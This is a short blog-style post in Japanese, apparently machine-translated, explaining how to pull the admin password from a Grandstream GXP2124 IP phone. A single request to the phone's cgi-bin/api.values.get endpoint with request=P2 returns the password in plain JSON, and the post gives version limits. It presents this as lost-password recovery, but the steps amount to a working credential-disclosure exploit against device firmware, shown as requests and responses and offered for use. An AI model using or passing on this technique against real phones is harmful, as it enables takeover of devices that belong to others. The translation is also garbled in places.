- 管理者パスワードの変更、管理者パスワードの必要;
- 電話機を工場出荷時設定にリセットするには、管理者パスワードが必要です。
- 電話を再フラッシュ-再びその紛失したパスワードが必要です...
この状況から抜け出す方法を見つけるには? はい、簡単です!
パスワードを「認識」するために、Furebugコンポーネントがインストールされた最も一般的なGoogle Chromeブラウザーと、アクセスできる別のGrandstream GXP2124電話を使用しました。
さらに、行動方針は次のとおりでした。
ブラウザを起動してFirebugユーティリティをオンにすると、さまざまなページを「歩き始め」ます。 要求リストに次が見つかりました。
POST cgi-bin / api.values.get
そして、答えの本文に記載されています:
{「応答」:「成功」、「本文」:{「vendor_fullname」:「Grandstream Networks、Inc.」}}
さらにスクロールすると、次のようなリクエストが見つかりました。
POST cgi-bin / api-phone_operation
パラメータが渡されたリクエストで:
cmd = extend&arg =&sid = 639534b3e5a
次は? 次に、セキュリティ設定に移動して、電話のパスワードを変更します。パスワードは既にアクセスでき、回答のリストを確認できます。
POST cgi-bin / api.values.post
ソース:
P2 = MyNewPass&:confirmAdminPwd = MyNewPass&sid = 639534b3e5a
ここで:
- P2-送信された管理者パスワード。
- confirmAdminPwd-管理者パスワードの確認。
- sid-現在のセッション(これは役に立ちません)。
さらに、想像力を示した後、次の形式の要求を行います。
192.168.1.253/cgi-bin/api.values.get?request=P2
ここで、 192.168.1.253は電話のIPアドレスです。
送信と...
...そして、次の形式のJSON応答を取得します。
{「応答」:「成功」、「ボディ」:{「P2」:「adminPass」}}
adminPassは現在の管理者パスワードです。
利益!
よろしく、アンドレイ・ヘルダー!
PS:上記のチップは、ファームウェアバージョン1.0.5.58までで動作します
ソフトウェアバージョン1.0.5.23で特にテストされました